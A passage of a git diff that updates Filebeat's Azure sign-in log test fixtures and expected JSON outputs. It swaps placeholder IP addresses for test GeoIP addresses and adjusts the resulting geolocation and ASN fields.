activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Microsoft Teams\",\"appId\":\"22222222-bce4-4aaf-ab1b-5451cc387264\",\"appliedConditionalAccessPolicies\":[{\"conditionsNotSatisfied\":0,\"conditionsSatisfied\":7,\"displayName\":\"01 - Require Windows Hybrid AD Joined Device\",\"enforcedGrantControls\":[\"RequireDomainJoinedDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-b7da-4d9e-ae41-779c5c256ac8\",\"result\":\"success\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"05 - MFA f\u00fcr G\u00e4ste\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-e960-42e6-ae3a-355df7e475d5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":12,\"conditionsSatisfied\":19,\"displayName\":\"02 - Mobile Device Policy\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-877a-4100-a0cf-5a589f2da3ad\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":16,\"conditionsSatisfied\":3,\"displayName\":\"04 - Block Legacy Authentication\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8e59-4055-87b1-b54a055a7ca5\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"06 - Enterprise Apps\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-39cb-4ec4-8ed2-ac1352d260ba\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"03 - Require MFA for Admins\",\"enforcedGrantControls\":[\"Mfa\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ea2f-4502-abb7-3689a1b0da41\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":1,\"conditionsSatisfied\":0,\"displayName\":\"07 - PowerAutomate 
Pilot\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-8b95-43cb-8e7d-69e34704ab56\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02c - Mobile Device Policy Device Compliance\",\"enforcedGrantControls\":[\"RequireCompliantDevice\"],\"enforcedSessionControls\":[],\"id\":\"22222222-ff75-460a-800c-7fe88bd9c877\",\"result\":\"notApplied\"},{\"conditionsNotSatisfied\":2,\"conditionsSatisfied\":1,\"displayName\":\"02d - MacOS\",\"enforcedGrantControls\":[\"Block\"],\"enforcedSessionControls\":[],\"id\":\"22222222-9886-4897-b2e2-a096cd37bac3\",\"result\":\"notApplied\"}],\"authenticationDetails\":[],\"authenticationProcessingDetails\":[{\"key\":\"Is Client Capable\",\"value\":\"True\"},{\"key\":\"IsCAEToken\",\"value\":\"False\"}],\"authenticationRequirement\":\"singleFactorAuthentication\",\"authenticationRequirementPolicies\":[],\"autonomousSystemNumber\":3320,\"clientAppUsed\":\"Mobile Apps and Desktop clients\",\"conditionalAccessStatus\":\"success\",\"correlationId\":\"22222222-18ab-4afa-aa79-21af67c8b108\",\"createdDateTime\":\"2021-07-30T11:20:59.7789167+00:00\",\"crossTenantAccessType\":\"none\",\"deviceDetail\":{\"browser\":\"Edge 18.1836\",\"deviceId\":\"22222222-1e7a-44dc-8bc9-5736d8e2b063\",\"displayName\":\"ABCDEFG\",\"operatingSystem\":\"Windows 10\",\"trustType\":\"Hybrid Azure AD 
joined\"},\"flaggedForReview\":false,\"homeTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"id\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"ipAddress\":\"216.160.83.61\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789123456},\"state\":\"Niedersachsen\"},\"networkLocationDetails\":[{\"networkNames\":[\"Hannover\"],\"networkType\":\"trustedNamedLocation\"}],\"originalRequestId\":\"22222222-fb7b-4f83-bf74-3876f9ef3900\",\"privateLinkDetails\":{},\"processingTimeInMilliseconds\":65,\"resourceDisplayName\":\"Office 365 Exchange Online\",\"resourceId\":\"22222222-0000-0ff1-ce00-000000000000\",\"resourceTenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"riskDetail\":\"none\",\"riskEventTypes\":[],\"riskEventTypes_v2\":[],\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"ssoExtensionVersion\":\"\",\"status\":{\"errorCode\":0},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363\",\"userDisplayName\":\"Hello World\",\"userId\":\"22222222-473d-4f4e-a526-ff54e71afe84\",\"userPrincipalName\":\"hello.world@company.de\",\"userType\":\"Member\"},\"resourceId\":\"/tenants/22222222-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"0\",\"tenantId\":\"22222222-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:20:59.7789167Z\"}", "event.outcome": "success", "event.type": [ "info" 
@@ -189,16 +189,20 @@ "log.level": "4", "log.offset": 0, "related.ip": [ - "11.22.33.44" + "216.160.83.61" ], "service.type": "azure", - "source.address": "11.22.33.44", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "FR", - "source.geo.country_name": "France", - "source.geo.location.lat": 48.8582, - "source.geo.location.lon": 2.3387, - "source.ip": "11.22.33.44", + "source.address": "216.160.83.61", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "tags": [ "forwarded" ], diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log index 88049d7edef3..2943c29665d6 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log +++ b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log 
@@ -1 +1 @@ -{"Level":4,"callerIpAddress":"11.22.33.44","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"11.22.33.44","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} +{"Level":4,"callerIpAddress":"216.160.83.61","category":"ServicePrincipalSignInLogs","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","durationMs":0,"location":"DE","operationName":"Sign-in 
activity","operationVersion":"1.0","properties":{"appId":"22222222-ddf2-4ab6-b25f-f23d5d614338","correlationId":"22222222-ece3-41ca-8e0d-1f1e1d8ac81a","createdDateTime":"2021-07-30T11:29:26.6733668+00:00","crossTenantAccessType":"none","flaggedForReview":false,"id":"22222222-5ec0-4795-bf9f-9017bcc32f00","ipAddress":"216.160.83.61","isInteractive":false,"isTenantRestricted":false,"location":{"city":"Hannover","countryOrRegion":"DE","geoCoordinates":{"latitude":50.12345678912345,"longitude":9.123456789012345},"state":"Niedersachsen"},"processingTimeInMilliseconds":0,"resourceDisplayName":"Configuration Manager Microservice","resourceId":"22222222-c916-4293-8373-d584996f60ae","riskDetail":"none","riskLevelAggregated":"low","riskLevelDuringSignIn":"low","riskState":"none","servicePrincipalId":"22222222-4677-43b4-a1dc-ecb3230e9350","servicePrincipalName":"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0","status":{"errorCode":7000222},"tokenIssuerType":"AzureAD","userId":null},"resourceId":"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam","resultSignature":"None","resultType":"7000222","tenantId":"1111111111-902d-4dea-8026-5a790862fede","time":"2021-07-30T11:29:26.6733668Z"} diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json index 0ec6daf9adf5..4de266113a0d 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/test-service-principal.log-expected.json @@ -29,7 +29,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "7000222", "azure.tenant_id": "1111111111-902d-4dea-8026-5a790862fede", - "client.ip": "11.22.33.44", + "client.ip": "216.160.83.61", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ 
@@ -40,7 +40,7 @@ "event.id": "22222222-5ec0-4795-bf9f-9017bcc32f00", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":4,\"callerIpAddress\":\"11.22.33.44\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"11.22.33.44\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", + "event.original": "{\"Level\":4,\"callerIpAddress\":\"216.160.83.61\",\"category\":\"ServicePrincipalSignInLogs\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"durationMs\":0,\"location\":\"DE\",\"operationName\":\"Sign-in 
activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appId\":\"22222222-ddf2-4ab6-b25f-f23d5d614338\",\"correlationId\":\"22222222-ece3-41ca-8e0d-1f1e1d8ac81a\",\"createdDateTime\":\"2021-07-30T11:29:26.6733668+00:00\",\"crossTenantAccessType\":\"none\",\"flaggedForReview\":false,\"id\":\"22222222-5ec0-4795-bf9f-9017bcc32f00\",\"ipAddress\":\"216.160.83.61\",\"isInteractive\":false,\"isTenantRestricted\":false,\"location\":{\"city\":\"Hannover\",\"countryOrRegion\":\"DE\",\"geoCoordinates\":{\"latitude\":50.12345678912345,\"longitude\":9.123456789012345},\"state\":\"Niedersachsen\"},\"processingTimeInMilliseconds\":0,\"resourceDisplayName\":\"Configuration Manager Microservice\",\"resourceId\":\"22222222-c916-4293-8373-d584996f60ae\",\"riskDetail\":\"none\",\"riskLevelAggregated\":\"low\",\"riskLevelDuringSignIn\":\"low\",\"riskState\":\"none\",\"servicePrincipalId\":\"22222222-4677-43b4-a1dc-ecb3230e9350\",\"servicePrincipalName\":\"ConfigMgrSvc_22222222-dfb4-4070-ad95-cf1e68280bb0\",\"status\":{\"errorCode\":7000222},\"tokenIssuerType\":\"AzureAD\",\"userId\":null},\"resourceId\":\"/tenants/1111111111-902d-4dea-8026-5a790862fede/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"resultType\":\"7000222\",\"tenantId\":\"1111111111-902d-4dea-8026-5a790862fede\",\"time\":\"2021-07-30T11:29:26.6733668Z\"}", "event.outcome": "failure", "event.type": [ "info" 
@@ -55,16 +55,20 @@
 "log.level": "4",
 "log.offset": 0,
 "related.ip": [
- "11.22.33.44"
+ "216.160.83.61"
 ],
 "service.type": "azure",
- "source.address": "11.22.33.44",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "FR",
- "source.geo.country_name": "France",
- "source.geo.location.lat": 48.8582,
- "source.geo.location.lon": 2.3387,
- "source.ip": "11.22.33.44",
+ "source.address": "216.160.83.61",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
+ "source.geo.continent_name": "North America",
+ "source.geo.country_iso_code": "US",
+ "source.geo.country_name": "United States",
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "tags": [
 "forwarded"
 ]
diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
index 4461734e570a..f0af6d501187 100644
--- a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
+++ b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log
@@ -1,2 +1,2 @@ -{"Level":"4","callerIpAddress":"1.1.1.1","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"1.1.1.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} -{"Level":"4","callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 
365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"8.8.8.8","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":"4","callerIpAddress":"89.160.20.156","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 
77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"89.160.20.156","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":"4","callerIpAddress":"175.16.199.1","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 
77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"175.16.199.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} diff --git a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json index 49b029ffee32..521b8989015b 100644 --- a/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json +++ b/x-pack/filebeat/module/azure/signinlogs/test/test-signinlogs-raw.log-expected.json @@ -36,7 +36,7 @@ "azure.signinlogs.result_signature": "None", "azure.signinlogs.result_type": "50140", "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", - "client.ip": "1.1.1.1", + "client.ip": "89.160.20.156", "cloud.provider": "azure", "event.action": "Sign-in activity", "event.category": [ 
@@ -47,7 +47,7 @@ "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"1.1.1.1\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"1.1.1.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", 
+ "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"89.160.20.156\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"89.160.20.156\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "event.outcome": "failure", "event.type": [ "info" 
@@ -63,18 +63,21 @@
 "log.offset": 0,
 "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.",
 "related.ip": [
- "1.1.1.1"
+ "89.160.20.156"
 ],
 "service.type": "azure",
- "source.address": "1.1.1.1",
- "source.as.number": 13335,
- "source.as.organization.name": "Cloudflare, Inc.",
- "source.geo.continent_name": "Oceania",
- "source.geo.country_iso_code": "AU",
- "source.geo.country_name": "Australia",
- "source.geo.location.lat": -33.494,
- "source.geo.location.lon": 143.2104,
- "source.ip": "1.1.1.1",
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "tags": [
 "forwarded"
 ],
@@ -120,7 +123,7 @@
 "azure.signinlogs.result_signature": "None",
 "azure.signinlogs.result_type": "50140",
 "azure.tenant_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
- "client.ip": "8.8.8.8",
+ "client.ip": "175.16.199.1",
 "cloud.provider": "azure",
 "event.action": "Sign-in activity",
 "event.category": [
@@ -131,7 +134,7 @@ "event.id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", "event.kind": "event", "event.module": "azure", - "event.original": "{\"Level\":\"4\",\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 